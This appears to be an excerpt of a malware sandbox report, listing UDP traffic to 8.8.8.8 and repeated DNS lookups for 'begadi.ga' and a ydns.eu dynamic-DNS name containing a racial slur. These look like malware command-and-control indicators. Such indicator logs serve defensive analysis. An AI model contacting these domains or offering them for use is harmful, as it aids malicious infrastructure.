Dec 21, 2020 08:34:22.874603033 CET	53	59126	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:23.283040047 CET	59136	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:23.310132027 CET	53	59136	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:23.741769075 CET	61938	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:23.765877962 CET	53	61938	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:24.340230942 CET	54603	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:24.373184919 CET	53	54603	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:24.808307886 CET	56472	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:24.835433960 CET	53	56472	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:25.262887001 CET	64956	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:25.289983988 CET	53	64956	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:25.710551977 CET	49558	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:25.736001968 CET	53	49558	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:26.160768032 CET	60485	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:26.185072899 CET	53	60485	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:26.614681959 CET	62070	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:26.638876915 CET	53	62070	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:27.062807083 CET	52196	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:27.087270975 CET	53	52196	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:27.520749092 CET	53324	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:27.544984102 CET	53	53324	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:27.986989021 CET	59208	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:28.019649982 CET	53	59208	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:28.446234941 CET	53489	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:28.470670938 CET	53	53489	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:28.886102915 CET	60104	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:28.910393953 CET	53	60104	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:29.338663101 CET	57579	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:29.363013029 CET	53	57579	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:29.768058062 CET	56516	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:29.792376041 CET	53	56516	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:30.464324951 CET	50926	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:30.488459110 CET	53	50926	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:31.077270031 CET	61266	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:31.113116026 CET	53	61266	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:31.530584097 CET	57279	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:31.554856062 CET	53	57279	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:31.997639894 CET	65273	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:32.024882078 CET	53	65273	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:32.732549906 CET	64307	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:32.765345097 CET	53	64307	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:33.196446896 CET	49977	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:33.223654985 CET	53	49977	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:33.646843910 CET	61667	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:33.679516077 CET	53	61667	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:34.237993002 CET	65274	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:34.262284994 CET	53	65274	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:34.832995892 CET	58029	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:34.860109091 CET	53	58029	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:35.595055103 CET	64534	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:35.622085094 CET	53	64534	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:36.298094034 CET	51031	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:36.322339058 CET	53	51031	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:36.745827913 CET	64254	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:36.769982100 CET	53	64254	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:37.184614897 CET	52696	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:37.208910942 CET	53	52696	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:37.667687893 CET	56479	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:37.691914082 CET	53	56479	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:38.116018057 CET	63874	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:38.143122911 CET	53	63874	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:38.580862999 CET	62985	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:38.605318069 CET	53	62985	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:39.014872074 CET	53083	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:39.042166948 CET	53	53083	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:39.460103035 CET	56129	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:39.484519958 CET	53	56129	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:39.922630072 CET	54898	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:39.949804068 CET	53	54898	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:40.387022018 CET	60996	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:40.411335945 CET	53	60996	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:40.870759010 CET	56871	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:40.897921085 CET	53	56871	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:41.326885939 CET	56681	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:41.351249933 CET	53	56681	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:41.787194967 CET	57030	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:41.811691046 CET	53	57030	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:42.230077028 CET	56842	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:42.254544020 CET	53	56842	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:42.685045958 CET	54769	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:42.712438107 CET	53	54769	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:43.125950098 CET	57976	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:43.150263071 CET	53	57976	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:43.560400009 CET	57822	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:43.584795952 CET	53	57822	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:44.009450912 CET	57816	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:44.036796093 CET	53	57816	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:44.446667910 CET	58218	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:44.473915100 CET	53	58218	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:44.919285059 CET	52925	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:44.954178095 CET	53	52925	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:45.405236959 CET	50088	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:45.429600954 CET	53	50088	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:45.873823881 CET	63974	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:45.901180983 CET	53	63974	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:46.292246103 CET	60174	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:46.319533110 CET	53	60174	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:46.737219095 CET	62566	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:46.761755943 CET	53	62566	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:47.190372944 CET	60502	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:47.214833975 CET	53	60502	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:47.621474028 CET	64666	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:48.633337975 CET	64666	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:49.651582956 CET	64666	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:49.678874969 CET	53	64666	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:50.100256920 CET	65172	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:50.124838114 CET	53	65172	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:50.556056976 CET	61683	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:50.580688000 CET	53	61683	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:51.002749920 CET	62288	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:51.027374983 CET	53	62288	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:51.549300909 CET	58473	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:51.576589108 CET	53	58473	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:51.980609894 CET	57284	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:52.005129099 CET	53	57284	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:53.237574100 CET	58015	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:53.261873960 CET	53	58015	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:53.671439886 CET	55470	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:53.698725939 CET	53	55470	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:54.125663996 CET	50974	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:54.152901888 CET	53	50974	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:54.601530075 CET	64934	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:54.628766060 CET	53	64934	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:55.073710918 CET	61741	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:55.097997904 CET	53	61741	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:55.533246040 CET	64069	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:55.557415962 CET	53	64069	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:55.991848946 CET	60995	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:56.016134977 CET	53	60995	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:56.432776928 CET	62291	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:56.456948042 CET	53	62291	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:56.894483089 CET	50900	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:56.921036005 CET	53	50900	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:57.346008062 CET	54131	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:57.370323896 CET	53	54131	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:57.803312063 CET	54293	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:57.836646080 CET	53	54293	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:58.262943029 CET	50519	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:58.287416935 CET	53	50519	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:58.711656094 CET	54187	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:58.736073017 CET	53	54187	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:59.157669067 CET	58673	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:59.182039022 CET	53	58673	8.8.8.8	192.168.2.22
Dec 21, 2020 08:34:59.615947008 CET	63779	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:34:59.643393993 CET	53	63779	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:00.071464062 CET	56240	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:00.095675945 CET	53	56240	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:00.519056082 CET	60915	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:00.546318054 CET	53	60915	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:00.951364994 CET	49177	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:00.984199047 CET	53	49177	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:01.390788078 CET	52037	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:01.415328979 CET	53	52037	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:01.849296093 CET	59411	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:01.873703957 CET	53	59411	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:02.301299095 CET	57033	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:02.325675964 CET	53	57033	8.8.8.8	192.168.2.22
Dec 21, 2020 08:35:02.741864920 CET	60843	53	192.168.2.22	8.8.8.8
Dec 21, 2020 08:35:02.766237974 CET	53	60843	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 21, 2020 08:33:20.079046011 CET	192.168.2.22	8.8.8.8	0x211b	Standard query (0)	chnesstdyqudusisabadassniggainthestfmv.ydns.eu	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:20.141686916 CET	192.168.2.22	8.8.8.8	0x211b	Standard query (0)	chnesstdyqudusisabadassniggainthestfmv.ydns.eu	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:31.913495064 CET	192.168.2.22	8.8.8.8	0x3397	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:32.661679029 CET	192.168.2.22	8.8.8.8	0x6b88	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:33.384108067 CET	192.168.2.22	8.8.8.8	0x5ac2	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:33.879810095 CET	192.168.2.22	8.8.8.8	0xff39	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:34.362772942 CET	192.168.2.22	8.8.8.8	0x5fb6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:34.881009102 CET	192.168.2.22	8.8.8.8	0x1b02	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:35.359441996 CET	192.168.2.22	8.8.8.8	0x4a26	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:35.837912083 CET	192.168.2.22	8.8.8.8	0xd57a	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:36.313498974 CET	192.168.2.22	8.8.8.8	0xf5d6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:36.808887959 CET	192.168.2.22	8.8.8.8	0x37e8	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:37.314598083 CET	192.168.2.22	8.8.8.8	0x2690	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:37.787421942 CET	192.168.2.22	8.8.8.8	0xdaa4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:38.269783974 CET	192.168.2.22	8.8.8.8	0x2801	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:38.743330002 CET	192.168.2.22	8.8.8.8	0x5d56	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:39.221379995 CET	192.168.2.22	8.8.8.8	0x41db	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:39.711550951 CET	192.168.2.22	8.8.8.8	0x4455	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:40.202322006 CET	192.168.2.22	8.8.8.8	0xced7	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:40.652861118 CET	192.168.2.22	8.8.8.8	0xaae	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:41.115207911 CET	192.168.2.22	8.8.8.8	0xf263	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:41.607522011 CET	192.168.2.22	8.8.8.8	0xf523	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:42.085715055 CET	192.168.2.22	8.8.8.8	0xb44c	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:42.570028067 CET	192.168.2.22	8.8.8.8	0x1bf6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:43.024233103 CET	192.168.2.22	8.8.8.8	0x3407	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:43.507846117 CET	192.168.2.22	8.8.8.8	0xd35b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:43.990227938 CET	192.168.2.22	8.8.8.8	0xa48	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:44.476102114 CET	192.168.2.22	8.8.8.8	0xbac1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:44.947941065 CET	192.168.2.22	8.8.8.8	0x6328	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:45.426358938 CET	192.168.2.22	8.8.8.8	0x5df6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:45.893923044 CET	192.168.2.22	8.8.8.8	0xaa4a	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:46.404953957 CET	192.168.2.22	8.8.8.8	0xa122	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:46.857896090 CET	192.168.2.22	8.8.8.8	0xb6ff	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:47.341500998 CET	192.168.2.22	8.8.8.8	0x3dd8	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:47.811341047 CET	192.168.2.22	8.8.8.8	0xc326	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:48.293976068 CET	192.168.2.22	8.8.8.8	0xfbaa	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:48.764221907 CET	192.168.2.22	8.8.8.8	0x9447	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:49.248095989 CET	192.168.2.22	8.8.8.8	0x1f33	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:49.738286972 CET	192.168.2.22	8.8.8.8	0xc5a6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:50.200308084 CET	192.168.2.22	8.8.8.8	0xcac4	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:50.703052044 CET	192.168.2.22	8.8.8.8	0xb096	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:51.166956902 CET	192.168.2.22	8.8.8.8	0xb47e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:51.634434938 CET	192.168.2.22	8.8.8.8	0x5bf1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:52.106240034 CET	192.168.2.22	8.8.8.8	0xed4e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:52.575071096 CET	192.168.2.22	8.8.8.8	0x5d81	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:53.053771019 CET	192.168.2.22	8.8.8.8	0x4d15	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:53.521665096 CET	192.168.2.22	8.8.8.8	0xb247	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:54.004151106 CET	192.168.2.22	8.8.8.8	0xd551	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:54.463464975 CET	192.168.2.22	8.8.8.8	0xaef1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:54.918165922 CET	192.168.2.22	8.8.8.8	0x2f5b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:55.372256041 CET	192.168.2.22	8.8.8.8	0x8fd0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:57.806827068 CET	192.168.2.22	8.8.8.8	0xef23	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:58.565279007 CET	192.168.2.22	8.8.8.8	0x476b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:59.039273977 CET	192.168.2.22	8.8.8.8	0xc2e9	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:59.513793945 CET	192.168.2.22	8.8.8.8	0x7013	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:33:59.963618994 CET	192.168.2.22	8.8.8.8	0x68ec	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:00.431229115 CET	192.168.2.22	8.8.8.8	0xd32f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:00.894161940 CET	192.168.2.22	8.8.8.8	0xf721	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:01.345640898 CET	192.168.2.22	8.8.8.8	0x9374	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:01.786082029 CET	192.168.2.22	8.8.8.8	0x8596	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:02.207808971 CET	192.168.2.22	8.8.8.8	0x3e26	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:02.980644941 CET	192.168.2.22	8.8.8.8	0x6e6d	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:03.739376068 CET	192.168.2.22	8.8.8.8	0xe7ff	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:04.201909065 CET	192.168.2.22	8.8.8.8	0x95e8	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:04.632169008 CET	192.168.2.22	8.8.8.8	0xe5b1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:05.084239006 CET	192.168.2.22	8.8.8.8	0x9f2d	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:05.539611101 CET	192.168.2.22	8.8.8.8	0x5352	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:05.976373911 CET	192.168.2.22	8.8.8.8	0x4f0f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:06.425539017 CET	192.168.2.22	8.8.8.8	0x7d0e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:06.876219988 CET	192.168.2.22	8.8.8.8	0x42b0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:07.333338022 CET	192.168.2.22	8.8.8.8	0xbedc	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:07.783689976 CET	192.168.2.22	8.8.8.8	0x8b5	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:08.236664057 CET	192.168.2.22	8.8.8.8	0x4597	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:08.676565886 CET	192.168.2.22	8.8.8.8	0x11a	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:09.131469011 CET	192.168.2.22	8.8.8.8	0x433f	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:09.589118958 CET	192.168.2.22	8.8.8.8	0x2e22	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:10.046735048 CET	192.168.2.22	8.8.8.8	0xeeaa	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:10.515592098 CET	192.168.2.22	8.8.8.8	0x9098	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:10.950223923 CET	192.168.2.22	8.8.8.8	0x1efc	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:11.411515951 CET	192.168.2.22	8.8.8.8	0x1ef9	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:11.841891050 CET	192.168.2.22	8.8.8.8	0x6af1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:12.305572033 CET	192.168.2.22	8.8.8.8	0xcad	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:12.768889904 CET	192.168.2.22	8.8.8.8	0xe282	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:13.222127914 CET	192.168.2.22	8.8.8.8	0x4e37	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:14.232207060 CET	192.168.2.22	8.8.8.8	0x4e37	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:15.630001068 CET	192.168.2.22	8.8.8.8	0xc5	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:16.071230888 CET	192.168.2.22	8.8.8.8	0x99b5	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:16.519520044 CET	192.168.2.22	8.8.8.8	0x7dc1	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:16.966084957 CET	192.168.2.22	8.8.8.8	0x11f3	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:17.457360983 CET	192.168.2.22	8.8.8.8	0x2e47	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:17.911499977 CET	192.168.2.22	8.8.8.8	0xdf58	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:18.360188007 CET	192.168.2.22	8.8.8.8	0xd0e6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:18.821360111 CET	192.168.2.22	8.8.8.8	0x36e	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:19.271018028 CET	192.168.2.22	8.8.8.8	0xcf0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:19.715977907 CET	192.168.2.22	8.8.8.8	0x8499	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:20.170018911 CET	192.168.2.22	8.8.8.8	0xdcb2	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:20.615250111 CET	192.168.2.22	8.8.8.8	0xfd1c	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:21.069551945 CET	192.168.2.22	8.8.8.8	0xbbf9	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:21.521275997 CET	192.168.2.22	8.8.8.8	0xf9d0	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:21.957238913 CET	192.168.2.22	8.8.8.8	0x5928	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:22.409060955 CET	192.168.2.22	8.8.8.8	0xcf51	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:22.841989040 CET	192.168.2.22	8.8.8.8	0x3c9b	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:23.283040047 CET	192.168.2.22	8.8.8.8	0xb87	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
Dec 21, 2020 08:34:23.741769075 CET	192.168.2.22	8.8.8.8	0x80c6	Standard query (0)	begadi.ga	A (IP address)	IN (0x0001)
